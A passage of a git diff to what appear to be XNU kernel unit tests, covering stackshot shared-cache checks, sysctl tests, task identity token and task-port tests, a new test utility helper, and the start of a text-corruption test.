is used"); + T_ASSERT_GT(totalout, UINT64_C(0), "successfully gathered how long the compressed buffer is"); + T_ASSERT_GT(totalin, UINT64_C(0), "successfully gathered how long the uncompressed buffer will be at least"); /* progress to the next kcdata item */ T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_STACKSHOT, "compressed stackshot found"); - void *bufferBase = kcdata_iter_payload(iter); + char *bufferBase = kcdata_iter_payload(iter); /* * zlib is used, allocate a buffer based on the metadata, plus @@ -1819,22 +2017,28 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD z_stream zs; memset(&zs, 0, sizeof(zs)); T_QUIET; T_ASSERT_EQ(inflateInit(&zs), Z_OK, "inflateInit OK"); - zs.next_in = bufferBase; - zs.avail_in = totalout; - zs.next_out = inflatedBufferBase; - zs.avail_out = inflatedBufferSize; + zs.next_in = (unsigned char *)bufferBase; + T_QUIET; T_ASSERT_LE(totalout, (uint64_t)UINT_MAX, "stackshot is not too large"); + zs.avail_in = (uInt)totalout; + zs.next_out = (unsigned char *)inflatedBufferBase; + T_QUIET; T_ASSERT_LE(inflatedBufferSize, (size_t)UINT_MAX, "output region is not too large"); + zs.avail_out = (uInt)inflatedBufferSize; T_ASSERT_EQ(inflate(&zs, Z_FINISH), Z_STREAM_END, "inflated buffer"); inflateEnd(&zs); - T_ASSERT_EQ(zs.total_out, totalin, "expected number of bytes inflated"); + T_ASSERT_EQ((uint64_t)zs.total_out, totalin, "expected number of bytes inflated"); /* copy the data after the compressed area */ - T_QUIET; T_ASSERT_LE(sslen - totalout - (bufferBase - ssbuf), + T_QUIET; T_ASSERT_GE((void *)bufferBase, ssbuf, + "base of compressed stackshot is after the returned stackshot buffer"); + size_t header_size = (size_t)(bufferBase - (char *)ssbuf); + size_t data_after_compressed_size = sslen - totalout - header_size; + T_QUIET; T_ASSERT_LE(data_after_compressed_size, inflatedBufferSize - zs.total_out, "footer fits in the buffer"); memcpy(inflatedBufferBase + zs.total_out, bufferBase + totalout, - sslen - totalout - (bufferBase - ssbuf)); + data_after_compressed_size); iter = kcdata_iter(inflatedBufferBase, inflatedBufferSize); } @@ -1931,21 +2135,61 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD id uuid = ptr[@"imageUUID"]; uint8_t uuid_p[16]; - for (int i = 0; i < 16; i ++) - uuid_p[i] = (uint8_t) ([[uuid objectAtIndex:i] intValue]); + for (unsigned int i = 0; i < 16; i ++) { + NSNumber *uuidByte = uuid[i]; + uuid_p[i] = (uint8_t)uuidByte.charValue; + } check_shared_cache_uuid(uuid_p); + uint64_t baseAddress = (uint64_t)((NSNumber *)ptr[@"imageSlidBaseAddress"]).longLongValue; + uint64_t firstMapping = (uint64_t)((NSNumber *)ptr[@"sharedCacheSlidFirstMapping"]).longLongValue; + + T_ASSERT_LE(baseAddress, firstMapping, + "in per-task shared_cache_dyld_load_info, " + "baseAddress <= firstMapping"); + T_ASSERT_GE(baseAddress + (1ull << 29), firstMapping, + "in per-task shared_cache_dyld_load_info, " + "baseAddress + 512meg >= firstMapping"); + + size_t shared_cache_len; + const void *addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_ASSERT_EQ((uint64_t)addr, firstMapping, + "SlidFirstMapping should match shared_cache_range"); + /* * check_shared_cache_uuid() will assert on failure, so if * we get here, then we have found the shared cache UUID * and it's correct */ - found_shared_cache_uuid = true; + found_shared_cache_uuid = true; + } + } + if (expect_sharedcache_child) { + uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue]; + uint64_t sharedregion_flags = (task_flags & (kTaskSharedRegionNone | kTaskSharedRegionSystem | kTaskSharedRegionOther)); + id sharedregion_info = container[@"task_snapshots"][@"shared_cache_dyld_load_info"]; + if (!found_sharedcache_badflags) { + T_QUIET; T_ASSERT_NE(sharedregion_flags, 0ll, "one of the kTaskSharedRegion flags should be set on all tasks"); + bool multiple = (sharedregion_flags & (sharedregion_flags - 1)) != 0; + T_QUIET; T_ASSERT_FALSE(multiple, "only one kTaskSharedRegion flag should be set on each task"); + found_sharedcache_badflags = (sharedregion_flags == 0 || multiple); + } + if (pid == 0) { + T_ASSERT_EQ(sharedregion_flags, (uint64_t)kTaskSharedRegionNone, "Kernel proc (pid 0) should have no shared region"); + } else if (pid == sharedcache_child_pid) { + found_sharedcache_child = true; + sharedcache_child_flags = sharedregion_flags; + } else if (pid == getpid()) { + found_sharedcache_self = true; + sharedcache_self_flags = sharedregion_flags; + } + if (sharedregion_flags == kTaskSharedRegionOther && !(task_flags & kTaskSharedRegionInfoUnavailable)) { + T_QUIET; T_ASSERT_NOTNULL(sharedregion_info, "kTaskSharedRegionOther should have a shared_cache_dyld_load_info struct"); + } else { + T_QUIET; T_ASSERT_NULL(sharedregion_info, "expect no shared_cache_dyld_load_info struct"); } } - - if (expect_zombie_child && (pid == zombie_child_pid)) { found_zombie_child = true; @@ -1959,7 +2203,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD found_translated_child = true; uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue]; - T_ASSERT_EQ((task_flags & kTaskIsTranslated), kTaskIsTranslated, "child marked as translated"); + T_EXPECT_BITS_SET(task_flags, kTaskIsTranslated, "child marked as translated"); continue; } @@ -1968,7 +2212,10 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"]; for (id i in winfos) { - if ([i[@"wait_type"] intValue] == kThreadWaitCompressor && [i[@"owner"] intValue] == cseg_expected_threadid) { + NSNumber *waitType = i[@"wait_type"]; + NSNumber *owner = i[@"owner"]; + if (waitType.intValue == kThreadWaitCompressor && + owner.unsignedLongValue == cseg_expected_threadid) { found_cseg_waitinfo = true; break; } @@ -1978,16 +2225,27 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD if (expect_srp_waitinfo) { NSArray *tinfos = container[@"task_snapshots"][@"thread_turnstileinfo"]; NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"]; - for (id i in tinfos) { if (!found_srp_waitinfo) { - if ([i[@"turnstile_context"] intValue] == srp_expected_pid && - ([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK)) { - - /* we found something that is blocking the correct pid */ + bool found_thread = false; + bool found_pid = false; + if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_THREAD) && + [i[@"turnstile_context"] unsignedLongLongValue] == srp_expected_threadid && + srp_expected_threadid != 0) { + found_thread = true; + } + if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK) && + [i[@"turnstile_context"] intValue] == srp_expected_pid && + srp_expected_pid != -1) { + found_pid = true; + } + if (found_pid || found_thread) { + T_LOG("found SRP %s %lld waiter: %d", (found_thread ? "thread" : "pid"), + [i[@"turnstile_context"] unsignedLongLongValue], [i[@"waiter"] intValue]); + /* we found something that is blocking the correct threadid */ for (id j in winfos) { if ([j[@"waiter"] intValue] == [i[@"waiter"] intValue] && - [j[@"wait_type"] intValue] == kThreadWaitPortReceive) { + [j[@"wait_type"] intValue] == kThreadWaitPortReceive) { found_srp_waitinfo = true; break; } @@ -2010,8 +2268,8 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD "current process name matches in stackshot"); uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue]; - T_ASSERT_NE((task_flags & kTerminatedSnapshot), kTerminatedSnapshot, "current process not marked as terminated"); - T_ASSERT_NE((task_flags & kTaskIsTranslated), kTaskIsTranslated, "current process not marked as translated"); + T_ASSERT_BITS_NOTSET(task_flags, kTerminatedSnapshot, "current process not marked as terminated"); + T_ASSERT_BITS_NOTSET(task_flags, kTaskIsTranslated, "current process not marked as translated"); T_QUIET; T_EXPECT_LE(pid, [task_snapshot[@"ts_unique_pid"] intValue], @@ -2032,6 +2290,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD bool found_main_thread = false; uint64_t main_thread_id = -1ULL; + bool found_null_kernel_frame = false; for (id thread_key in container[@"task_snapshots"][@"thread_snapshots"]) { NSMutableDictionary *thread = container[@"task_snapshots"][@"thread_snapshots"][thread_key]; NSDictionary *thread_snap = thread[@"thread_snapshot"]; @@ -2057,8 +2316,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD [cpu_times[@"user_time"] intValue], "runnable time of current thread is valid"); } + if (!found_null_kernel_frame) { + for (NSNumber *frame in thread[@"kernel_frames"]) { + if (frame.unsignedLongValue == 0) { + found_null_kernel_frame = true; + break; + } + } + } } T_EXPECT_TRUE(found_main_thread, "found main thread for current task in stackshot"); + T_EXPECT_FALSE(found_null_kernel_frame, "should not see any NULL kernel frames"); if (expect_turnstile_lock && !found_turnstile_lock) { NSArray *tsinfos = container[@"task_snapshots"][@"thread_turnstileinfo"]; @@ -2073,10 +2341,22 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD break; } case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: { - struct dyld_uuid_info_64_v2 *payload = kcdata_iter_payload(iter); - T_ASSERT_EQ(kcdata_iter_size(iter), sizeof(*payload), "valid dyld_uuid_info_64_v2 struct"); + struct dyld_shared_cache_loadinfo *payload = kcdata_iter_payload(iter); + T_ASSERT_EQ((size_t)kcdata_iter_size(iter), sizeof(*payload), "valid dyld_shared_cache_loadinfo struct"); + + check_shared_cache_uuid(payload->sharedCacheUUID); + + T_ASSERT_LE(payload->sharedCacheUnreliableSlidBaseAddress, + payload->sharedCacheSlidFirstMapping, + "SlidBaseAddress <= SlidFirstMapping"); + T_ASSERT_GE(payload->sharedCacheUnreliableSlidBaseAddress + (1ull << 29), + payload->sharedCacheSlidFirstMapping, + "SlidFirstMapping should be within 512megs of SlidBaseAddress"); - check_shared_cache_uuid(payload->imageUUID); + size_t shared_cache_len; + const void *addr = _dyld_get_shared_cache_range(&shared_cache_len); + T_ASSERT_EQ((uint64_t)addr, payload->sharedCacheSlidFirstMapping, + "SlidFirstMapping should match shared_cache_range"); /* * check_shared_cache_uuid() asserts on failure, so we must have @@ -2088,6 +2368,19 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD } } + if (expect_sharedcache_child) { + T_QUIET; T_ASSERT_TRUE(found_sharedcache_child, "found sharedcache child in kcdata"); + T_QUIET; T_ASSERT_TRUE(found_sharedcache_self, "found self in kcdata"); + if (found_sharedcache_child && found_sharedcache_self) { + T_QUIET; T_ASSERT_NE(sharedcache_child_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache child should have shared region"); + T_QUIET; T_ASSERT_NE(sharedcache_self_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache: self should have shared region"); + if (sharedcache_self_flags == kTaskSharedRegionSystem && !sharedcache_child_sameaddr) { + /* If we're in the system shared region, and the child has a different address, child must have an Other shared region */ + T_ASSERT_EQ(sharedcache_child_flags, (uint64_t)kTaskSharedRegionOther, + "sharedcache child should have Other shared region"); + } + } + } if (expect_zombie_child) { T_QUIET; T_ASSERT_TRUE(found_zombie_child, "found zombie child in kcdata"); } diff --git a/tests/sysctl_get_owned_vmobjects.c b/tests/sysctl_get_owned_vmobjects.c index cedc9f7ec..c8f26eb5a 100644 --- a/tests/sysctl_get_owned_vmobjects.c +++ b/tests/sysctl_get_owned_vmobjects.c @@ -89,7 +89,18 @@ main_test(void) T_EXPECT_EQ(out_buffer->entries, 1ULL, "should have 1 vm object\n"); T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n"); - /* get the list for the current process */ + /* get the list for the current process with an overly large size */ + out_size = SIZE_MAX; + memset(out_buffer, 0, output_size); + ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name)); + + T_QUIET; + T_EXPECT_EQ(ret, 0, "sysctlbyname failed\n"); + T_EXPECT_EQ(out_size, 2 * sizeof(vm_object_query_data_t) + sizeof(int64_t), "sysctl return size is incorrect\n"); + T_EXPECT_EQ(out_buffer->entries, 2ULL, "should have 2 vm objects\n"); + T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n"); + + /* get the list for the current process with the correct output size */ out_size = output_size; memset(out_buffer, 0, output_size); ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name)); diff --git a/tests/sysctl_hw.c b/tests/sysctl_hw.c index 823e1123f..de9329a37 100644 --- a/tests/sysctl_hw.c +++ b/tests/sysctl_hw.c @@ -5,6 +5,8 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist") { char buffer[64] = ""; size_t buffer_size = sizeof(buffer); + int v; + size_t v_size; int ret = sysctlbyname("hw.target", buffer, &buffer_size, NULL, 0); @@ -25,4 +27,15 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist") T_ASSERT_POSIX_SUCCESS(ret, "machdep.cpu.brand_string sysctl"); T_LOG("machdep.cpu.brand_string = %s", buffer); + + v = 0; + v_size = sizeof(v); + ret = sysctlbyname("hw.cpu64bit_capable", &v, &v_size, NULL, 0); + T_ASSERT_POSIX_SUCCESS(ret, "hw.cpu64bit_capable"); + +#if __arm__ + T_EXPECT_EQ(v, 0, "cpu is not 64 bit capable"); +#else + T_EXPECT_EQ(v, 1, "cpu is 64 bit capable"); +#endif } diff --git a/tests/task_for_pid_entitlement.plist b/tests/task_for_pid_entitlement.plist index 2398d67f5..da1e64ce3 100644 --- a/tests/task_for_pid_entitlement.plist +++ b/tests/task_for_pid_entitlement.plist @@ -6,5 +6,13 @@ task_for_pid-allow + + com.apple.system-task-ports.control + + + + com.apple.security.get-movable-control-port + + diff --git a/tests/task_ident_test.c b/tests/task_ident_test.c new file mode 100644 index 000000000..8fab0e90a --- /dev/null +++ b/tests/task_ident_test.c @@ -0,0 +1,62 @@ +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +T_DECL(task_ident, "test task identity token") +{ + kern_return_t kr; + task_id_token_t token; + mach_port_t port1, port2; + + kr = task_create_identity_token(mach_task_self(), &token); + T_ASSERT_MACH_SUCCESS(kr, "task_create_identity_token()"); + + port1 = mach_task_self(); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_CONTROL, &port2); /* Immovable control port for self */ + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - CONTROL"); + T_EXPECT_EQ(port1, port2, "Control port does not match!"); + + mach_port_deallocate(mach_task_self(), port2); + + kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port1); + T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - READ"); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_READ, &port2); + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - read"); + T_EXPECT_EQ(port1, port2, "Read port does not match!"); + + mach_port_deallocate(mach_task_self(), port1); + mach_port_deallocate(mach_task_self(), port2); + + kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port1); + T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - INSPECT"); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_INSPECT, &port2); + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - inspect"); + T_EXPECT_EQ(port1, port2, "Inspect port does not match!"); + + mach_port_deallocate(mach_task_self(), port1); + mach_port_deallocate(mach_task_self(), port2); + + kr = task_get_special_port(mach_task_self(), TASK_NAME_PORT, &port1); + T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - NAME"); + kr = task_identity_token_get_task_port(token, TASK_FLAVOR_NAME, &port2); + T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - name"); + T_EXPECT_EQ(port1, port2, "Name port does not match!"); + + mach_port_deallocate(mach_task_self(), port1); + mach_port_deallocate(mach_task_self(), port2); + + kr = task_identity_token_get_task_port(mach_thread_self(), TASK_FLAVOR_NAME, &port2); + T_EXPECT_NE(kr, KERN_SUCCESS, "task_identity_token_get_task_port() should fail on non-token port"); + + mach_port_deallocate(mach_task_self(), token); +} diff --git a/tests/task_info.c b/tests/task_info.c index a40a5d569..f887beee6 100644 --- a/tests/task_info.c +++ b/tests/task_info.c @@ -13,6 +13,8 @@ #include #include +#include "test_utils.h" + T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true)); /* ************************************************************************************* @@ -51,7 +53,6 @@ void test_task_basic_info_32(void); void test_task_basic_info_64(void); void task_basic_info_32_debug(void); void task_basic2_info_32_warmup(void); -static int is_development_kernel(void); void test_task_basic_info(enum info_kind kind); uint64_t info_get(enum info_kind kind, enum info_get get, void * data); @@ -1144,28 +1145,3 @@ info_get(enum info_kind kind, enum info_get get, void * data) __builtin_unreachable(); } - -/* - * Determines whether we're running on a development kernel - */ -static int -is_development_kernel(void) -{ -#define NOTSET -1 - - static int is_dev = NOTSET; - - if (is_dev == NOTSET) { - int dev; - size_t dev_size = sizeof(dev); - - T_QUIET; - T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, &dev_size, NULL, 0), NULL); - is_dev = (dev != 0); - - return is_dev; - } else { - return is_dev; - } -#undef NOTSET -} diff --git a/tests/task_inspect.c b/tests/task_inspect.c deleted file mode 100644 index b9fbe2ee7..000000000 --- a/tests/task_inspect.c +++ /dev/null @@ -1,146 +0,0 @@ -#ifdef T_NAMESPACE -#undef T_NAMESPACE -#endif - -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"), - T_META_RUN_CONCURRENTLY(true)); - -/* - * Attempt to inspect kernel_task using a task_inspect_t. Interact with the - * kernel in the same way top(1) and lsmp(1) do. - */ - -static void -check_secure_kernel(void) -{ - int secure_kern = 0; - size_t secure_kern_size = sizeof(secure_kern); - - T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern, - &secure_kern_size, NULL, 0), NULL); - - if (secure_kern) { - T_SKIP("secure kernel: processor_set_tasks will not return kernel_task"); - } -} - -static void -attempt_kernel_inspection(task_t task) -{ - pid_t pid = (pid_t)-1; - mach_msg_type_number_t i, count, thcnt; - struct task_basic_info_64 ti; - thread_act_array_t threads; - - T_QUIET; - T_EXPECT_MACH_SUCCESS(pid_for_task(task, &pid), NULL); - T_LOG("Checking pid %d", pid); - - if (pid != 0) { - return; - } - - T_LOG("found kernel_task, attempting to inspect"); - - count = TASK_BASIC_INFO_64_COUNT; - T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti, - &count), "task_info(... TASK_BASIC_INFO_64 ...)"); - - T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads"); - T_LOG("Found %d kernel threads.", thcnt); - for (i = 0; i < thcnt; i++) { - kern_return_t kr; - thread_basic_info_data_t basic_info; - mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT; - - kr = thread_info(threads[i], THREAD_BASIC_INFO, - (thread_info_t)&basic_info, &bi_count); - /* - * Ignore threads that have gone away. - */ - if (kr == MACH_SEND_INVALID_DEST) { - T_LOG("ignoring thread that has been destroyed"); - continue; - } - T_EXPECT_MACH_SUCCESS(kr, "thread_info(... THREAD_BASIC_INFO ...)"); - (void)mach_port_deallocate(mach_task_self(), threads[i]); - } - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)threads, - thcnt * sizeof(*threads)); - - ipc_info_space_basic_t basic_info; - T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info"); - - ipc_info_space_t info_space; - ipc_info_name_array_t table; - ipc_info_tree_name_array_t tree; - mach_msg_type_number_t tblcnt = 0, treecnt = 0; - T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table, - &tblcnt, &tree, &treecnt), "mach_port_space_info"); - if (tblcnt > 0) { - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)table, - tblcnt * sizeof(*table)); - } - if (treecnt > 0) { - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)tree, - treecnt * sizeof(*tree)); - } - - T_END; -} - -T_DECL(inspect_kernel_task, - "ensure that kernel task can be inspected", - T_META_CHECK_LEAKS(false), - T_META_ASROOT(true)) -{ - processor_set_name_array_t psets; - processor_set_t pset; - task_array_t tasks; - mach_msg_type_number_t i, j, tcnt, pcnt = 0; - mach_port_t self = mach_host_self(); - - check_secure_kernel(); - - T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt), - NULL); - - for (i = 0; i < pcnt; i++) { - T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL); - T_LOG("Checking pset %d/%d", i, pcnt - 1); - - tcnt = 0; - T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL); - - for (j = 0; j < tcnt; j++) { - attempt_kernel_inspection(tasks[j]); - mach_port_deallocate(self, tasks[j]); - } - - /* free tasks array */ - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)tasks, - tcnt * sizeof(*tasks)); - mach_port_deallocate(mach_task_self(), pset); - mach_port_deallocate(mach_task_self(), psets[i]); - } - mach_vm_deallocate(mach_task_self(), - (mach_vm_address_t)(uintptr_t)psets, - pcnt * sizeof(*psets)); - - T_FAIL("could not find kernel_task in list of tasks returned"); -} diff --git a/tests/task_inspect.entitlements b/tests/task_inspect.entitlements deleted file mode 100644 index eaaf1dedb..000000000 --- a/tests/task_inspect.entitlements +++ /dev/null @@ -1,10 +0,0 @@ - - - - - com.apple.system-task-ports - - task_for_pid-allow - - - diff --git a/tests/task_is_self.c b/tests/task_is_self.c new file mode 100644 index 000000000..9882c467f --- /dev/null +++ b/tests/task_is_self.c @@ -0,0 +1,25 @@ +#include +#include +#include +#include + +T_DECL(mach_task_is_self, + "test task port comparison check") +{ + mach_port_t self_insp, self_read, self_name, port; + + T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_READ_PORT, &self_read), "task_get_special_port failed"); + T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &self_insp), "task_get_special_port failed"); + T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_NAME_PORT, &self_name), "task_get_special_port failed"); + + T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate failed"); + + T_EXPECT_NE(self_read, self_insp, "read and inspect port should be different"); + T_EXPECT_NE(self_read, mach_task_self(), "read and control port should be different"); + + T_EXPECT_EQ(1, mach_task_is_self(mach_task_self()), "control port should point to self"); + T_EXPECT_EQ(1, mach_task_is_self(self_read), "read port should point to self"); + T_EXPECT_EQ(1, mach_task_is_self(self_insp), "inspect port should point to self"); + T_EXPECT_EQ(1, mach_task_is_self(self_name), "name port should point to self"); + T_EXPECT_NE(1, mach_task_is_self(port), "_port_ should not point to self"); +} diff --git a/tests/test_dext_launch_56101852.c b/tests/test_dext_launch_56101852.c deleted file mode 100644 index 99ad78213..000000000 --- a/tests/test_dext_launch_56101852.c +++ /dev/null @@ -1,101 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include - -T_GLOBAL_META(T_META_NAMESPACE("xnu.iokit"), - T_META_RUN_CONCURRENTLY(true)); - -#define DEXT_NAME "com.apple.test_intentionally_crashing_driver_56101852.dext" -#define DEXT_PATH "/Library/DriverExtensions/" DEXT_NAME -#define SYSCTL_NAME "kern.driverkit_checkin_timed_out" -#define MAX_TIMEOUT_SECONDS 120 - -static int -copyfileCallback(int what __unused, int stage, copyfile_state_t state __unused, const char *src __unused, const char *dst, void *ctx __unused) -{ - if (stage == COPYFILE_FINISH) { - T_QUIET; T_ASSERT_POSIX_SUCCESS(chown(dst, 0, 0), "chown %s to root / wheel", dst); - } - return COPYFILE_CONTINUE; -} - -static void -cleanup(void) -{ - removefile_state_t state = removefile_state_alloc(); - removefile(DEXT_PATH, state, REMOVEFILE_RECURSIVE); - removefile_state_free(state); -} - -T_DECL(test_dext_launch_56101852, - "Test launching a crashing dext", - T_META_ASROOT(true), T_META_IGNORECRASHES("*test_intentionally_crashing_driver_56101852*")) -{ - T_SKIP("skipping test_dext_launch_56101852 due to 62657199"); - - CFStringRef path = NULL; - CFURLRef url = NULL; - uint64_t startTime = mach_absolute_time(); - uint64_t endTime = 0; - size_t endTimeSize = sizeof(uint64_t); - uint64_t elapsedTimeAbs = 0; - uint64_t elapsedTimeNs = 0; - mach_timebase_info_data_t timebaseInfo; - copyfile_state_t copyfileState; - - copyfileState = copyfile_state_alloc(); - copyfile_state_set(copyfileState, COPYFILE_STATE_STATUS_CB, (void *)©fileCallback); - T_ASSERT_POSIX_SUCCESS(copyfile(DEXT_NAME, DEXT_PATH, copyfileState, COPYFILE_RECURSIVE | COPYFILE_ALL), "copied dext " DEXT_NAME " to " DEXT_PATH); - T_ATEND(cleanup); - - /* set up timebaseInfo */ - T_ASSERT_MACH_SUCCESS(mach_timebase_info(&timebaseInfo), "set up mach_timebase_info"); - - /* Set the initial value of kern.driverkit_checkin_timed_out to startTime */ - T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, NULL, NULL, &startTime, sizeof(startTime)), "set sysctl " SYSCTL_NAME " to %llu", startTime); - - - /* Convert DEXT_PATH to a CFURL */ - path = CFSTR(DEXT_PATH); - url = CFURLCreateWithFileSystemPath(kCFAllocatorDefault, path, kCFURLPOSIXPathStyle, true); - T_ASSERT_NOTNULL(url, "created CFURL from CFString"); - - /* Ask kextd to load the dext */ - T_ASSERT_EQ(KextManagerLoadKextWithURL(url, NULL), kOSReturnSuccess, "Loaded dext %s with kextd", DEXT_PATH); - T_LOG("Will sleep for up to %d seconds", MAX_TIMEOUT_SECONDS); - - /* Wait for up to 120 seconds. Each loop iteration sleeps for 1 second and checks - * the value of the sysctl to check if it has changed. If the value changed, then - * the dext loaded earlier has crashed. If 120 seconds elapses and the value does - * not change, then the dext did not crash. - */ - for (int i = 0; i < MAX_TIMEOUT_SECONDS; i++) { - sleep(1); - T_ASSERT_POSIX_SUCCESS(sysctlbyname(SYSCTL_NAME, &endTime, &endTimeSize, NULL, 0), "using " SYSCTL_NAME " to check if dext has crashed"); - if (endTime != startTime) { - T_LOG("Detected dext crash"); - break; - } - T_LOG(" Slept for %d seconds", i + 1); - } - - T_LOG("startTime = %llu, endTime = %llu", startTime, endTime); - - T_ASSERT_GT(endTime, startTime, "dext has crashed"); - - /* Check how much time has elapsed and see if it is less than 120 seconds. If it - * is 120 seconds or greater, then the dext did not check in to the kernel but we - * were not able to stop waiting for the dext to check in after it crashed. - */ - elapsedTimeAbs = endTime - startTime; - elapsedTimeNs = elapsedTimeAbs * timebaseInfo.numer / timebaseInfo.denom; - T_LOG("elapsedTimeAbs = %llu, elapsedTimeNs = %llu", elapsedTimeAbs, elapsedTimeNs); - T_ASSERT_LT(elapsedTimeNs / NSEC_PER_SEC, (uint64_t)MAX_TIMEOUT_SECONDS, "elapsed time is less than %d seconds", MAX_TIMEOUT_SECONDS); - - copyfile_state_free(copyfileState); - CFRelease(url); -} diff --git a/tests/test_dext_launch_56101852.entitlements b/tests/test_dext_launch_56101852.entitlements deleted file mode 100644 index 842b583b2..000000000 --- a/tests/test_dext_launch_56101852.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.private.security.storage.SystemExtensionManagement - - - diff --git a/tests/test_utils.c b/tests/test_utils.c new file mode 100644 index 000000000..e5197d41a --- /dev/null +++ b/tests/test_utils.c @@ -0,0 +1,25 @@ +#include +#include +#include +#include + +#include "test_utils.h" + +bool +is_development_kernel() +{ + static dispatch_once_t is_development_once; + static bool is_development; + + dispatch_once(&is_development_once, ^{ + int dev; + size_t dev_size = sizeof(dev); + + T_QUIET; + T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, + &dev_size, NULL, 0), NULL); + is_development = (dev != 0); + }); + + return is_development; +} diff --git a/tests/test_utils.h b/tests/test_utils.h new file mode 100644 index 000000000..655e69994 --- /dev/null +++ b/tests/test_utils.h @@ -0,0 +1,8 @@ +#ifndef XNU_DARWINTEST_UTILS_H +#define XNU_DARWINTEST_UTILS_H + +#include + +/* Misc. utility functions for writing darwintests. */ +bool is_development_kernel(void); +#endif /* !defined(XNU_DARWINTEST_UTILS_H) */ diff --git a/tests/text_corruption.c b/tests/text_corruption.c new file mode 100644 index 000000000..d2ebe0773 --- /dev/null +++ b/tests/text_corruption.c @@ -0,0 +1,80 @@ +#include +#include + +#include +#include + +T_GLOBAL_META(T_META_RUN_CONCURRENTLY(false)); + +/* + * No system(3c) on watchOS, so provide our own. + * returns -1 if fails to run + * returns 0 if process exits normally. + * returns +n if process exits due to signal N + */ +static int +my_system(const char *command) +{ + pid_t pid; + int status = 0; + int signal = 0; + int err; + const char *argv[] = { + "/bin/sh", + "-c", + command, + NULL + }; + + if (dt_launch_tool(&pid, (char **)(void *)argv, FALSE, NULL, NULL)) { + return -1; + } + + err = dt_waitpid(pid, &status, &signal, 30); + if (err) { + return 0; + } + + return signal; +} + + +/* + * The tests are run in the following order: + * + * - call foo + * - corrupt foo, then call foo + * - call foo + * + * - call atan + * - corrupt atan, then call atan + * - call atan + * + * The first and last of each should exit normally. The middle one should exit 